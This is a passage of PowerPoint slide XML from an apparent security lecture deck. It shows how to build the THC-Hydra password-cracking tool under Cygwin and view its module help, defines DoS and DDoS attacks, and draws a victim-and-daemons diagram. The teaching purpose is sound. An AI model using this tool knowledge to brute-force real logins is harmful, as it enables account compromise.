                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CYGWIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cd C:\hydra-7.3     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Type "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>", then "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>" and finally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:effectLst/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For help type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For help for module: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra –U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>module-name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra –U http-form-post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>maaaaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>thc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-hydra-windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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3076" name="Picture 4" descr="http://upload.wikimedia.org/wikipedia/commons/thumb/2/29/Cygwin_logo.svg/512px-Cygwin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368513"/>
            <a:ext cx="1676400"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842369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4876800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THC-Hydra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52700"/>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7" t="36065" r="82417" b="23889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="1371600"/>
            <a:ext cx="2855495" cy="2051637"/>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4267200" y="4114800"/>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3081152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Attack (DoS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Denial of Service attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attempt to make a computer resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>unavailable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to its intended users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending messages which exhaust service provider’s resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network bandwidth, system resources, application resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="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921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4800599"/>
            <a:ext cx="2438400" cy="167756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041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Distributed Denial-of-service (DDoS) Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DDoS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employing multiple (dozens  to millions) compromised computers to perform a coordinated and widely distributed DoS attack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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905000" y="3634596"/>
            <a:ext cx="5334000" cy="2590800"/>
            <a:chOff x="1447800" y="1600200"/>
            <a:chExt cx="6858000" cy="4038600"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3124200" y="2514600"/>
              <a:ext cx="2486025" cy="1827213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 292 w 2235"/>
                <a:gd name="T1" fmla="*/ 585 h 1642"/>
                <a:gd name="T2" fmla="*/ 172 w 2235"/>
                <a:gd name="T3" fmla="*/ 594 h 1642"/>
                <a:gd name="T4" fmla="*/ 103 w 2235"/>
                <a:gd name="T5" fmla="*/ 628 h 1642"/>
                <a:gd name="T6" fmla="*/ 0 w 2235"/>
                <a:gd name="T7" fmla="*/ 869 h 1642"/>
                <a:gd name="T8" fmla="*/ 43 w 2235"/>
                <a:gd name="T9" fmla="*/ 1084 h 1642"/>
                <a:gd name="T10" fmla="*/ 86 w 2235"/>
                <a:gd name="T11" fmla="*/ 1178 h 1642"/>
                <a:gd name="T12" fmla="*/ 94 w 2235"/>
                <a:gd name="T13" fmla="*/ 1204 h 1642"/>
                <a:gd name="T14" fmla="*/ 215 w 2235"/>
                <a:gd name="T15" fmla="*/ 1299 h 1642"/>
                <a:gd name="T16" fmla="*/ 404 w 2235"/>
                <a:gd name="T17" fmla="*/ 1470 h 1642"/>
                <a:gd name="T18" fmla="*/ 472 w 2235"/>
                <a:gd name="T19" fmla="*/ 1531 h 1642"/>
                <a:gd name="T20" fmla="*/ 498 w 2235"/>
                <a:gd name="T21" fmla="*/ 1539 h 1642"/>
                <a:gd name="T22" fmla="*/ 533 w 2235"/>
                <a:gd name="T23" fmla="*/ 1556 h 1642"/>
                <a:gd name="T24" fmla="*/ 653 w 2235"/>
                <a:gd name="T25" fmla="*/ 1642 h 1642"/>
                <a:gd name="T26" fmla="*/ 1410 w 2235"/>
                <a:gd name="T27" fmla="*/ 1617 h 1642"/>
                <a:gd name="T28" fmla="*/ 1530 w 2235"/>
                <a:gd name="T29" fmla="*/ 1582 h 1642"/>
                <a:gd name="T30" fmla="*/ 1667 w 2235"/>
                <a:gd name="T31" fmla="*/ 1548 h 1642"/>
                <a:gd name="T32" fmla="*/ 1814 w 2235"/>
                <a:gd name="T33" fmla="*/ 1410 h 1642"/>
                <a:gd name="T34" fmla="*/ 1882 w 2235"/>
                <a:gd name="T35" fmla="*/ 1307 h 1642"/>
                <a:gd name="T36" fmla="*/ 1925 w 2235"/>
                <a:gd name="T37" fmla="*/ 1264 h 1642"/>
                <a:gd name="T38" fmla="*/ 2054 w 2235"/>
                <a:gd name="T39" fmla="*/ 989 h 1642"/>
                <a:gd name="T40" fmla="*/ 2132 w 2235"/>
                <a:gd name="T41" fmla="*/ 903 h 1642"/>
                <a:gd name="T42" fmla="*/ 2175 w 2235"/>
                <a:gd name="T43" fmla="*/ 826 h 1642"/>
                <a:gd name="T44" fmla="*/ 2192 w 2235"/>
                <a:gd name="T45" fmla="*/ 791 h 1642"/>
                <a:gd name="T46" fmla="*/ 2235 w 2235"/>
                <a:gd name="T47" fmla="*/ 645 h 1642"/>
                <a:gd name="T48" fmla="*/ 2226 w 2235"/>
                <a:gd name="T49" fmla="*/ 551 h 1642"/>
                <a:gd name="T50" fmla="*/ 1908 w 2235"/>
                <a:gd name="T51" fmla="*/ 456 h 1642"/>
                <a:gd name="T52" fmla="*/ 1857 w 2235"/>
                <a:gd name="T53" fmla="*/ 430 h 1642"/>
                <a:gd name="T54" fmla="*/ 1805 w 2235"/>
                <a:gd name="T55" fmla="*/ 267 h 1642"/>
                <a:gd name="T56" fmla="*/ 1728 w 2235"/>
                <a:gd name="T57" fmla="*/ 232 h 1642"/>
                <a:gd name="T58" fmla="*/ 1547 w 2235"/>
                <a:gd name="T59" fmla="*/ 181 h 1642"/>
                <a:gd name="T60" fmla="*/ 1427 w 2235"/>
                <a:gd name="T61" fmla="*/ 147 h 1642"/>
                <a:gd name="T62" fmla="*/ 1392 w 2235"/>
                <a:gd name="T63" fmla="*/ 129 h 1642"/>
                <a:gd name="T64" fmla="*/ 1203 w 2235"/>
                <a:gd name="T65" fmla="*/ 104 h 1642"/>
                <a:gd name="T66" fmla="*/ 1091 w 2235"/>
                <a:gd name="T67" fmla="*/ 18 h 1642"/>
                <a:gd name="T68" fmla="*/ 1040 w 2235"/>
                <a:gd name="T69" fmla="*/ 0 h 1642"/>
                <a:gd name="T70" fmla="*/ 928 w 2235"/>
                <a:gd name="T71" fmla="*/ 9 h 1642"/>
                <a:gd name="T72" fmla="*/ 851 w 2235"/>
                <a:gd name="T73" fmla="*/ 35 h 1642"/>
                <a:gd name="T74" fmla="*/ 816 w 2235"/>
                <a:gd name="T75" fmla="*/ 61 h 1642"/>
                <a:gd name="T76" fmla="*/ 791 w 2235"/>
                <a:gd name="T77" fmla="*/ 69 h 1642"/>
                <a:gd name="T78" fmla="*/ 730 w 2235"/>
                <a:gd name="T79" fmla="*/ 155 h 1642"/>
                <a:gd name="T80" fmla="*/ 696 w 2235"/>
                <a:gd name="T81" fmla="*/ 284 h 1642"/>
                <a:gd name="T82" fmla="*/ 447 w 2235"/>
                <a:gd name="T83" fmla="*/ 318 h 1642"/>
                <a:gd name="T84" fmla="*/ 275 w 2235"/>
                <a:gd name="T85" fmla="*/ 327 h 1642"/>
                <a:gd name="T86" fmla="*/ 137 w 2235"/>
                <a:gd name="T87" fmla="*/ 361 h 1642"/>
                <a:gd name="T88" fmla="*/ 111 w 2235"/>
                <a:gd name="T89" fmla="*/ 430 h 1642"/>
                <a:gd name="T90" fmla="*/ 180 w 2235"/>
                <a:gd name="T91" fmla="*/ 447 h 1642"/>
                <a:gd name="T92" fmla="*/ 275 w 2235"/>
                <a:gd name="T93" fmla="*/ 473 h 1642"/>
                <a:gd name="T94" fmla="*/ 309 w 2235"/>
                <a:gd name="T95" fmla="*/ 525 h 1642"/>
                <a:gd name="T96" fmla="*/ 292 w 2235"/>
                <a:gd name="T97" fmla="*/ 576 h 1642"/>
                <a:gd name="T98" fmla="*/ 292 w 2235"/>
                <a:gd name="T99" fmla="*/ 58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5" h="1642">
                  <a:moveTo>
                    <a:pt x="292" y="585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="588"/>
                    <a:pt x="211" y="585"/>
                    <a:pt x="172" y="594"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="600"/>
                    <a:pt x="103" y="628"/>
                    <a:pt x="103" y="628"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="703"/>
                    <a:pt x="20" y="782"/>
                    <a:pt x="0" y="869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="975"/>
                    <a:pt x="1" y="1003"/>
                    <a:pt x="43" y="1084"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1122"/>
                    <a:pt x="71" y="1143"/>
                    <a:pt x="86" y="1178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="1186"/>
                    <a:pt x="88" y="1197"/>
                    <a:pt x="94" y="1204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="1253"/>
                    <a:pt x="171" y="1220"/>
                    <a:pt x="215" y="1299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267" y="1393"/>
                    <a:pt x="303" y="1430"/>
                    <a:pt x="404" y="1470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="1490"/>
                    <a:pt x="449" y="1517"/>
                    <a:pt x="472" y="1531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="1536"/>
                    <a:pt x="490" y="1536"/>
                    <a:pt x="498" y="1539"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="1544"/>
                    <a:pt x="522" y="1549"/>
                    <a:pt x="533" y="1556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="1585"/>
                    <a:pt x="598" y="1629"/>
                    <a:pt x="653" y="1642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="916" y="1638"/>
                    <a:pt x="1154" y="1632"/>
                    <a:pt x="1410" y="1617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1450" y="1605"/>
                    <a:pt x="1490" y="1593"/>
                    <a:pt x="1530" y="1582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1575" y="1570"/>
                    <a:pt x="1627" y="1572"/>
                    <a:pt x="1667" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1725" y="1513"/>
                    <a:pt x="1758" y="1447"/>
                    <a:pt x="1814" y="1410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1837" y="1374"/>
                    <a:pt x="1853" y="1340"/>
                    <a:pt x="1882" y="1307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1895" y="1292"/>
                    <a:pt x="1914" y="1281"/>
                    <a:pt x="1925" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="1178"/>
                    <a:pt x="2009" y="1079"/>
                    <a:pt x="2054" y="989"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="951"/>
                    <a:pt x="2111" y="939"/>
                    <a:pt x="2132" y="903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2147" y="878"/>
                    <a:pt x="2161" y="852"/>
                    <a:pt x="2175" y="826"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2181" y="815"/>
                    <a:pt x="2192" y="791"/>
                    <a:pt x="2192" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2204" y="730"/>
                    <a:pt x="2216" y="699"/>
                    <a:pt x="2235" y="645"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2232" y="614"/>
                    <a:pt x="2232" y="582"/>
                    <a:pt x="2226" y="551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2200" y="424"/>
                    <a:pt x="1975" y="459"/>
                    <a:pt x="1908" y="456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1891" y="450"/>
                    <a:pt x="1869" y="445"/>
                    <a:pt x="1857" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1821" y="385"/>
                    <a:pt x="1848" y="311"/>
                    <a:pt x="1805" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1774" y="235"/>
                    <a:pt x="1770" y="241"/>
                    <a:pt x="1728" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1668" y="203"/>
                    <a:pt x="1611" y="196"/>
                    <a:pt x="1547" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1522" y="175"/>
                    <a:pt x="1429" y="148"/>
                    <a:pt x="1427" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1415" y="141"/>
                    <a:pt x="1405" y="132"/>
                    <a:pt x="1392" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1333" y="114"/>
                    <a:pt x="1264" y="110"/>
                    <a:pt x="1203" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1153" y="87"/>
                    <a:pt x="1140" y="40"/>
                    <a:pt x="1091" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="11"/>
                    <a:pt x="1040" y="0"/>
                    <a:pt x="1040" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="3"/>
                    <a:pt x="965" y="2"/>
                    <a:pt x="928" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="901" y="14"/>
                    <a:pt x="851" y="35"/>
                    <a:pt x="851" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="44"/>
                    <a:pt x="829" y="54"/>
                    <a:pt x="816" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="808" y="65"/>
                    <a:pt x="798" y="64"/>
                    <a:pt x="791" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="762" y="89"/>
                    <a:pt x="746" y="125"/>
                    <a:pt x="730" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="726" y="189"/>
                    <a:pt x="724" y="256"/>
                    <a:pt x="696" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="636" y="344"/>
                    <a:pt x="498" y="316"/>
                    <a:pt x="447" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="321"/>
                    <a:pt x="332" y="324"/>
                    <a:pt x="275" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="334"/>
                    <a:pt x="186" y="346"/>
                    <a:pt x="137" y="361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="374"/>
                    <a:pt x="83" y="402"/>
                    <a:pt x="111" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="438"/>
                    <a:pt x="179" y="447"/>
                    <a:pt x="180" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="454"/>
                    <a:pt x="243" y="466"/>
                    <a:pt x="275" y="473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="485"/>
                    <a:pt x="311" y="503"/>
                    <a:pt x="309" y="525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="543"/>
                    <a:pt x="292" y="576"/>
                    <a:pt x="292" y="576"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="588"/>
                    <a:pt x="327" y="585"/>
                    <a:pt x="292" y="585"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF66"/>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a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3657600" y="5029200"/>
              <a:ext cx="1371600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="996633"/>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Victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Oval 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6248400" y="3581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Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5029200" y="16002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Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6553200" y="2590800"/>
              <a:ext cx="12192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Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1447800" y="28956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Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1524000" y="4343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Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4267200" y="4343400"/>
              <a:ext cx="0" cy="68580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2514600" y="3771900"/>
              <a:ext cx="1828800" cy="1181100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1152"/>
                <a:gd name="T1" fmla="*/ 408 h 744"/>
                <a:gd name="T2" fmla="*/ 624 w 1152"/>
                <a:gd name="T3" fmla="*/ 24 h 744"/>
                <a:gd name="T4" fmla="*/ 1056 w 1152"/>
                <a:gd name="T5" fmla="*/ 264 h 744"/>
                <a:gd name="T6" fmla="*/ 1152 w 1152"/>
                <a:gd name="T7" fmla="*/ 744 h 744"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1152" h="744">
                  <a:moveTo>
                    <a:pt x="0" y="408"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="228"/>
